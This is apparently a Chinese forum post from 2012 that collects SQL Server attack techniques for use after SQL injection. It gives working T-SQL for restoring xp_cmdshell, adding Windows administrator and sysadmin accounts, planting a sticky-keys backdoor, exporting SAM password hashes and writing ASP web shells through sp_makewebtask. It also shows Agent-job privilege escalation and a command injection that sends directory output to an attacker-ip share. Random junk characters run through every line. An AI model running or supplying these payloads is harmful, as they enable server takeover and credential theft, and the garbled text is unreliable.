1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
3 f9 l% q1 `( k: [' _+ _7 q( ?6 T, |恢复方法:查询分离器连接后," B4 h0 Y0 e$ B; j; U
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int & Y( G# u! w; E$ V, u
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 _% j. Y- ?6 r5 V M然后按F5键命令执行完毕: q; |# K3 h3 Y
' `; D/ t9 P3 e6 F9 y* O
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
% }+ ]: S# l% f; a0 |恢复方法:查询分离器连接后,
0 K( l6 b( Q* U9 K. t( p第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
3 _9 M& s& t% J* C7 L第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ ?& N9 t6 C, n, s9 L" d然后按F5键命令执行完毕' @, g# c7 [$ V6 f& z& v0 N5 F
9 S8 x) a- C- v) s8 C: G% B
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" b' R5 R& U1 U+ `* o恢复方法:查询分离器连接后,
+ @4 S* m; r0 ?) L0 n第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
/ n9 @- e3 z! I第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' & i- M3 N6 t+ l5 G3 i. c" R
然后按F5键命令执行完毕) ^2 ~: x/ u2 A8 i" E$ j/ ~4 t
% L& Q- J2 _) q$ b0 U8 K! l9 H1 ?% D7 |
4 终极方法.; v! j7 g7 r0 C1 K& T
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
: u$ S' e4 d; r9 o* ?& m$ a: t查询分离器连接后,) G2 X3 i" b) \% N/ L$ x3 s4 ~1 t9 t
2000servser系统:# T/ r& D# Z7 B0 t! d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'1 M( S$ F( z/ ]: G! [. U# L5 M
6 o3 p3 y3 _% B* \7 r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'/ F. c0 P3 ~7 J0 \3 V$ \
5 e) u( O* Q; g1 q+ i' Z
xp或2003server系统:4 ^2 }, K5 i# F2 Y2 ` e: ?* k
3 Y9 W6 R8 N1 n7 z! [& P1 s' B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
7 D! Z: J2 O+ s% j- _, j9 G7 p% A$ W( B8 g" X" p* `% _. E8 b9 f, ?; [, h
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
0 P# c. ^$ Q$ d$ T
) ^0 z6 ]- F9 i q* |) Z" S( y) H8 x
0 i) t0 O7 Q( c0 D2 f5 ^五个SHIFT
. U3 J; [: R) v( \- Odeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';1 @- ^6 w6 O$ ?: I& h
; m6 B& P7 ~) V0 V" e
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; % _5 L, j0 ?9 {! @) P/ N
0 _- ?! ~: {6 B+ r5 B) ~xp_cmdshell执行命令另一种方法* q: k( g9 g o7 Q; ?
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
3 [# Z4 Z1 Y3 Q1 H3 d7 ~, P$ D v% ^" I& a
判断存储扩展是否存在3 M/ y3 Z& X0 y
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
7 p0 h8 t$ I, y: L返回结果为1就OK
$ F; v$ z& }3 o/ p5 D$ i
1 S/ |6 y$ [$ @
+ u$ t9 [! d' O( e. h; |9 g上传xplog70.dll恢复xp_cmdshell语句:" B7 @0 m% T" t" V8 L+ I# M7 N% ]( U
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'# B" @4 P# A `) Y+ z0 ]& o
6 M% K4 p' \+ P
否则上传xplog7.0.dll
$ D' p* x' e7 [Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'; @- w! B" A) Q H. M% @
. {. f, D* M/ S- A" g q, ?
0 S# h+ v) T0 X
) n6 ]# L1 Z x% W# f9 a) c. ^( Z0 }首先开启沙盘模式:& R+ l e; R* P; z
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
5 |) X4 ?; ~9 }! J
4 x v* _: _, [1 ?" i& x$ H然后利用jet.oledb执行系统命令/ M5 _7 h: w" N% N9 {
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
* \8 [0 O0 u, J s2 a: d返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
: [, p# D$ {+ @0 X0 s" T/ y) Y3 L
g. N# k! f9 L! U; I, d
( j5 S" D" y, Y2 `6 ^, L0 c" D; r0 w- T" M
恢复过程sp_addextendedproc 如下: 8 x7 c$ |# U) W D7 ^/ t% N
create procedure sp_addextendedproc --- 1996/08/30 20:13
( C, @ P% q9 F+ w@functname nvarchar(517),/* (owner.)name of function to call */ : d- p% g9 g& o
@dllname varchar(255)/* name of DLL containing function */ ! R9 V2 c6 y: ]) l4 V
as
- u+ \% @" O. L7 o+ L9 B. o. tset implicit_transactions off
1 ~4 J% H# b, i* i+ R E! Hif @@trancount > 0
0 b/ a0 o* g! {. b" Wbegin
# i6 u3 J/ ?: Graiserror(15002,-1,-1,'sp_addextendedproc') ( r' G" `$ Q- c% [0 P
return (1) $ a9 A; {( d( a! l
end
3 Y) G: ^2 H, P Mdbcc addextendedproc( @functname, @dllname)
; q6 \+ a% Z) Y2 k/ r/ J; o' Yreturn (0) -- sp_addextendedproc
+ V+ r5 f* T1 N2 _% `( rGO & ^" U( s7 {* t8 ?" { F
. t [& Z& h5 O/ b7 v7 a8 _& G$ E( ^- v' I" E F2 P1 F& f
$ c1 E! C. F, e导出管理员密码文件# }! C$ R: _! J/ C s2 f2 m
sa默认可以读sam键.应该。
) u# f5 [6 }& W: }: v6 B. treg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg H: m. t5 k2 |8 U# R0 h) E/ o \
net user administrator test
1 h4 _$ d0 I& q6 n C* c/ W, S6 {用administrator登陆.
V, S/ o& ?- l" A用完机器后( {/ W9 q- c5 ~7 W/ b& @
reg import c:\test.reg0 w% x9 E6 k1 z7 n
根本不用克隆. f% i; M5 E" n) t1 O% d% P" m
找到对应的sid. ; P: O9 D ?# L8 M
" d+ U$ Z1 p" B0 d8 o& P
* k( i4 `4 g* H9 _
' y7 q; a Q( e% r恢复所有存储过程0 `% }, _; r8 D
use master
% c' o# |4 P% T% `; ]exec sp_addextendedproc xp_enumgroups,'xplog70.dll' 0 I* X1 t+ A7 t! K
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 5 C# v6 I: h6 c4 t2 k
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' 1 |5 k6 v2 W8 Z/ h y+ H+ h' f, |. U
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
6 ]; G& Y+ H9 y& q/ }, Qexec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 6 N0 h) @0 Q" D5 F& c& [
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
4 q* i J" }3 \& W# V' \exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
) v3 w0 \2 s9 o6 u( Hexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' * U6 I0 Z7 t3 V) F* }2 m
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
7 h7 I# _4 x& z: {# B* s/ ^4 \exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
, t* U: C) p3 p2 c" |( T Xexec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
. {5 l$ g0 B) }7 \# l2 c! b! Rexec sp_addextendedproc sp_OAStop,'odsole70.dll' % V: x. F8 c1 _' d/ ?+ _
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' ! M7 m; z8 h! X4 q' Q4 D* m& ]
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
& k7 ~% H6 L* k n, k* |- Xexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
) x6 V6 e* f5 |exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
% ?* A% E: Z1 D; p- e/ L" nexec sp_addextendedproc xp_regread,'xpstar.dll'
& v5 c& U8 A% d0 u+ nexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
0 _8 b O8 f* L+ B2 X% b2 @7 Y; Nexec sp_addextendedproc xp_regwrite,'xpstar.dll'
3 B3 I9 K; R9 z7 Y1 \exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
- r/ M4 }/ N" o: F$ J! K0 E$ W
# x4 O$ B0 D5 o4 t. A# h6 ?建立读文件的存储过程9 m- }$ ~4 j! q9 k
Create proc sp_readTextFile @filename sysname3 t2 O1 Z) x* s/ r/ P
as
6 v7 ^7 j: \: E$ V% M4 E! h; Y. P z0 }
begin 9 s. b4 a: k* [3 Z6 y
set nocount on
9 Q" ^" Q) ~2 {; y Create table #tempfile (line varchar(8000))
6 I$ @1 q# _& J T exec ('bulk insert #tempfile from "' + @filename + '"')
m& N; b$ w( X& M: [ select * from #tempfile
8 d: I8 u z5 S' t drop table #tempfile8 |4 T: x/ C6 M: N& w
End+ H+ e( I6 o2 v* j2 w( H
9 h; c9 h1 n2 R" v* s
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件; T/ f. {. E ^# e) \9 S
查看登录用户
$ z5 ^) p1 A3 K: H" i) t2 ]Select * from sysxlogins+ K( D7 V+ ?7 ^6 f# z
4 B7 Q, I: R1 b把文件内容读取到表中
7 V+ `0 |, w, G5 v9 ? Z u" fBULK INSERT tmp from "c:\test.txt"
, v2 ?5 y* \, {+ s; ^7 ~dElete from 表名 清理表里的内容0 K0 Y' }' f) U5 f" V. {. _2 D% L
create table b_test(fn nvarchar(4000));建一个表,字段为fn3 F; e$ W) s7 u& }! E
8 U( S9 [9 G$ T
7 Z1 S7 u& D/ ]9 X) m& h5 r- O3 m: ?" b加sa用户
6 g% ^2 {! e% J! P0 fexec master.dbo.sp_addlogin user,pass;! F$ \2 u, s) a; H5 Q
exec master.dbo.sp_addsrvrolemember user,sysadmin
% C N5 R0 _6 ]6 T2 y
4 t* W$ L/ h9 ?0 X6 T& w6 f7 G' N3 e* s# Z {! b
0 m2 p. c7 L' g8 R q& |读文件代码
5 V7 c7 }0 V% q6 ?, F gdeclare @o int, @f int, @t int, @ret int- o9 L5 T. P% i4 ?' p
declare @line varchar(8000): R4 u- e4 u- V. N) C1 T1 ` ^
exec sp_oacreate 'scripting.filesystemobject', @o out8 W: Y' ?9 z5 \, B4 f
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1, D6 ]. _0 ?+ L9 u* O* F8 s
exec @ret = sp_oamethod @f, 'readline', @line out3 D$ O! {0 ~! v; u* }# B
while( @ret = 0 )6 \9 p! s# o: m2 Y1 m+ M: j$ l
begin0 U- n- X4 i1 }( l. o& f4 m
print @line
6 @0 ~7 t! f' p& ] S+ y. G& G) zexec @ret = sp_oamethod @f, 'readline', @line out. {' B" S6 \0 ?' M" {0 y8 C
end, z! U: b' d) `) |! Q6 Q+ L
# j. A3 e) Y7 J. Y! \
# s$ o) {. Y+ |. E' }) e9 c
写文件代码:
. |% u/ J$ R% r& {: [4 @1 G6 X' A% N+ Ideclare @o int, @f int, @t int, @ret int% O/ d3 Q0 }9 r: `
exec sp_oacreate 'scripting.filesystemobject', @o out% K( V0 K1 d& f @9 Y. t3 W
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1) V% m9 }. ` {& ~
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
1 G" f* b/ k# G* N
- I" \% x" y" L8 v4 O9 G& z8 a; Z8 f7 w8 K
添加lake2 shell
9 A. m$ g. ?0 u% ~sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
6 T& c$ c. `% Z% |( v' @) Xsp_dropextendedproc xp_lake2& Y3 G7 ~$ |8 b4 c8 r" q/ n: P1 T
EXEC xp_lake2 'net user'
/ R3 W3 s1 ]1 f8 U2 |' e" q! a4 \( [+ x7 E! P/ J% S& ^
* V L) Q: h. e1 u0 j+ _得到硬盘文件信息 8 t1 g7 Y: Q, \2 ~, x8 [
--参数说明:目录名,目录深度,是否显示文件
C2 v, u* [3 i" S& E# t$ x+ `execute master..xp_dirtree 'c:'
: M4 ^% _5 d, J* u$ vexecute master..xp_dirtree 'c:',1
' g; i- f* |. h$ t6 m) R/ Hexecute master..xp_dirtree 'c:',1,1 : W4 ^; Q3 N/ Z# p# r
3 p. I$ e( \, ^0 D4 \
3 Z. W0 v& k9 H4 _* V
读serv-u配置信息
' @/ }- s' K; J0 M2 C- ~1 @exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
2 ]8 @, A: P8 {' ]exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini': t# o; G; X2 f) d7 i( t9 y. e
% \ k$ r/ X) e5 U8 K3 c0 |! x
通过xp_regwrite写SHIFT后门
3 s1 M6 N6 b- P7 h$ ]exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
/ q8 q7 d8 g& M& N4 S5 f* m9 a3 i5 x1 N2 ?/ @0 w
( u0 l* y9 }! |$ L; ]7 {
6 B. K9 ]; y- }5 `7 U找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
5 G5 x' w1 F) l7 V" [" U4 @exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了$ @% F4 F" N( {$ z1 Q
; a# ~# q# b$ a' ^# ^EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
V8 N5 h) Q( [2 p! G: n% x! ~* Q9 P3 u3 N# t; M
& {* \ q# m ^6 G. |/ W4 ^- A/ m7 x4 M% g
sql server 2005下开启xp_cmdshell的办法
& M& e0 V6 ~ z7 M4 a9 [5 L; I/ y9 Y2 u3 I; I. R- [
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;+ @% m0 T3 c4 B7 l2 A
6 x. c4 {. W V" F# B4 B) _SQL2005开启'OPENROWSET'支持的方法:' [5 ^- M* t9 h. }6 E! h
+ l" B7 c; V4 y9 G; L; l7 A$ vexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
/ n# g* D6 F( e$ h0 f% Q5 f
" @: P/ }; `6 f- o) W6 y: WSQL2005开启'sp_oacreate'支持的方法:
1 R: v |! x6 ~, l0 S% p" F9 P) V% y1 u% G8 t+ S
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
! |0 \. O1 r4 U5 L& J1 s$ b5 E; w4 U
7 u2 h# L) m C& [4 {4 a
3 q' t5 s5 ?- ]* V- f8 M
8 y& k: }" q/ E
& V' j& \4 x' h% s. o! h- i
+ P! Y3 K2 E5 E5 ?% }
0 [+ L( R) S, D5 R/ b
5 w0 g% L+ p0 \8 l% {! E4 ^+ ~& n: H0 ]7 W& Q2 T: \2 |5 d; g
6 d, s+ U0 T- ~& H L$ ^
. l7 j5 l/ ?& F4 n6 p
) U7 r- P( w' t6 T9 H7 D/ R
# ~0 @/ @# [ H0 x& t) ]0 h/ r" P2 j& B9 T' k4 H
* O S, p- f- [$ a7 X+ o% e2 {; Q9 t G7 B
( m. h. F; T/ ? g c& |2 K$ O/ H: B& n1 V3 N4 q
/ X; K# K* }. i' A5 Y+ i
4 L) [5 t3 C! V' ], V- n' S; n9 m+ d! _$ k0 k+ E9 e, T
7 g2 k) r7 }; m! ]; g2 d! ?) i
9 w T3 X- _/ _; I1 \5 u9 j% D. p$ z$ z# z
以下方面不知道能不能成功暂且留下研究哈:
& T6 j$ ]% O0 H5 U9 o$ X0 K2 \: E4)0 J- U3 ?0 ?* Z% w$ ^) t2 w. q
use msdb; --这儿不要是master哟2 ]5 D% G( K3 x& s* e, Y4 `
exec sp_add_job @job_name= czy82 ;/ u% o0 S" L. X4 |3 g
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;" M3 F5 Z$ q, |+ S
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;$ X4 e) j: s3 }& [0 G ?" U6 z4 a: k
exec sp_start_job @job_name= czy82 ;
6 f" r2 L# m' A( A" \8 {' a1 c( D
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
5 N E8 `! k$ c) ~执行tsql语句了.1 J+ }( ~$ j9 u9 Q
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
% ^1 S. I+ i0 X% N1 R0 v. a第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
5 f, Y9 h* S- ~3 j. |/ H3 ^/ w) ~net start SQLSERVERAGENT4 z& c% N6 }' @2 E5 E
0 A& p7 p3 }/ ~. E4 z" ~
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
* o8 U2 b/ I9 P; \8 TUSE msdb
' U( A1 O8 P8 x, ^$ g+ x/ t$ \' ~EXEC sp_add_job @job_name = GetSystemOnSQL ,! {, c* [( H: ~$ [# Y' u
@enabled = 1,9 [/ h _3 u: M9 ^: T
@description = This will give a low privileged user access to! J1 t+ H* v4 o: j v
xp_cmdshell ,
" O* Z# o$ Q. {! B! ]@delete_level = 1
% ^- P+ p4 L3 R& b: FEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,1 m, z: ~" A% F5 Y3 n, {3 z
@step_name = Exec my sql ,. h' [# k( R; J7 Q9 m! T
@subsystem = TSQL ,
$ w0 G. s5 Q. g! q4 n@command = exec master..xp_execresultset N select exec
4 I6 F j9 K- }master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
7 d' f, d; ~4 p# L8 Y& G6 oEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
7 I9 C, v! B& u. u/ H. n@server_name = 你的SQL的服务器名
: X2 n7 D4 R1 Q- REXEC sp_start_job @job_name = GetSystemOnSQL * r" f# H: {' X2 J" I9 S4 E T5 B. M
$ E2 e% O& @- E5 I4 Y不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以9 _9 ?6 k0 N S3 o7 t' |
才让我们可以以public执行xp_cmdshell
9 N) S/ N2 p! H, Z/ v- T* O* ~
q( V; q1 E& ^2 I. T* G1 [5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
2 q% A7 } x* N3 ~8 K$ A1 t0 R在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
0 _4 B5 c, O8 x& D: l: V! [' A
$ F5 z; N( p4 g& BUSE msdb
- ]2 r: d% k0 L2 k1 sEXEC sp_add_job @job_name = ArbitraryFilecreate ,
# O' d; t7 y) K2 Y/ l@enabled = 1,
% p0 B, G' k9 D1 i, h" v@description = This will create a file called c:\sqlafc123.txt ,% `4 U0 m4 @" O4 H7 s, w0 o. \
@delete_level = 1
4 u0 |8 q8 }6 Z6 n% N- M# YEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
7 M+ I, x8 q- D: X! C7 |@step_name = SQLAFC ,4 O. u6 d% F" S& A. M- y; E7 w5 v, m Z
@subsystem = TSQL ,8 \# D; S5 v5 k. i
@command = select hello, this file was created by the SQL Agent. ,
1 F" w; b6 {2 |+ n5 Y1 W@output_file_name = c:\sqlafc123.txt
a% z9 m1 x8 VEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
9 I b1 J+ o" S: u$ n@server_name = SERVER_NAME
' [( b9 f6 j# d$ R3 NEXEC sp_start_job @job_name = ArbitraryFilecreate
' X6 B+ ^: G% ?7 m' q( r2 n; ?- L) i! ~7 w8 e
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
) e7 r k" _1 h5 l/ X9 V
" R9 n7 X4 ]- d' \9 ?& {??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
" m4 @( Y1 K5 y4 M" _2 J# g----------------------------------------------
0 n, h5 _, e; E; qhello, this file was created by the SQL Agent.
1 M+ Q9 }/ z7 Q- M$ x6 t0 q' i( e
5 P" D8 @$ z! m3 D4 ^# R; _8 a(1 ?????)
0 Y3 P6 ]3 l+ y4 C) l
0 K& ]7 ~2 T" `; r+ a1 s所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员# D0 g% n7 J' H! |8 `. w( S
命令的vbs文件到启动目录!" g/ { e, f' G* N( ]0 V9 x
: s( |. _7 A: g( u5 |
6)关于sp_makewebtask(可以写任意内容任意文件名的文件) }1 ^- X# _6 V4 J
关于sp_MScopyscriptfile 看下面的例子4 H' ?, j O" [6 f! o& o' y9 w ^( p
declare @command varchar(100)
: E8 z1 t j( J+ ?1 c" Rdeclare @scripfile varchar(200) 4 ] I& L7 m$ ^# Z; @
set concat_null_yields_null off
$ T* U% I( ]" m& B: d5 r1 ~select @command= dir c:\ > "\\attackerip\share\dir.txt" 9 K# I! |- |( e
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
3 j6 Y1 m5 I3 t; N5 E$ uexec sp_MScopyscriptfile @scripfile ,
3 S0 b; k% h" j, p8 l5 t. f1 t
* ]; f& x+ _0 I8 \% W$ X0 g2 }! ?这两个东东都还在测试试哟
8 O3 a6 G: f3 b' M4 y让MSSQL的public用户得到一个本机的web shell
: _1 v% e: P" z& R2 U! u# o5 j3 G
; @1 Q) l! t# l) C1 I: m$ Lsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,5 p8 [/ {! f) x
--@query= select <img src=vbscript:msgbox(now())> - s T& _" |/ Y) S. B/ y+ v
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
/ u6 l' T/ ?0 U, C7 L' y@query= select
/ a, d8 ]- \+ p$ h: k& q<%On Error Resume Next
) |: P+ x! P' `" u1 c& r9 USet oscript = Server.createObject("wscript.SHELL") ! Q% t' j4 W4 a, y4 O
Set oscriptNet = Server.createObject("wscript.NETWORK")
6 C. Q! N6 J9 d- L# hSet oFileSys = Server.createObject("scripting.FileSystemObject")
3 L# X% \; e1 k- x" Q" P @szCMD = Request.Form(".CMD")
3 E/ L' @% |- |( BIf (szCMD <>"")Then 5 M; }, V# D r& f% h M1 }
szTempFile = "C:\" & oFileSys.GetTempName()
+ q. a2 u5 x8 qCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) , N- Z0 V7 e2 o: u
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
F" ~) p( e( ~+ V j) ]End If %> & x0 F' n( |/ h, I* _
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
9 e- y; |( z1 [, Q<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> ; F6 n! x) r, C% P; d% u
</FORM><RE>
F* t$ R+ c2 p1 {" h<% If (IsObject(oFile))Then 6 ?1 g, e6 h& n6 c
On Error Resume Next
* G; |0 _3 b6 s/ y: X( g7 hResponse.Write Server.HTMLEncode(oFile.ReadAll) ( [, ~9 R% J8 H6 ~% ]. R& E5 \# Q# I) f
oFile.Close
! v: g N1 K. d0 w: o) _Call oFileSys.deleteFile(szTempFile, True) 2 T6 u) P$ O$ a
End If%>
; |1 _4 n: ]; i3 f9 ?' U! `; H</BODY></HTML>
/ B6 u, q* U$ F; ]1 y |
发表于 2012-9-15 14:37:30
收藏
支持
反对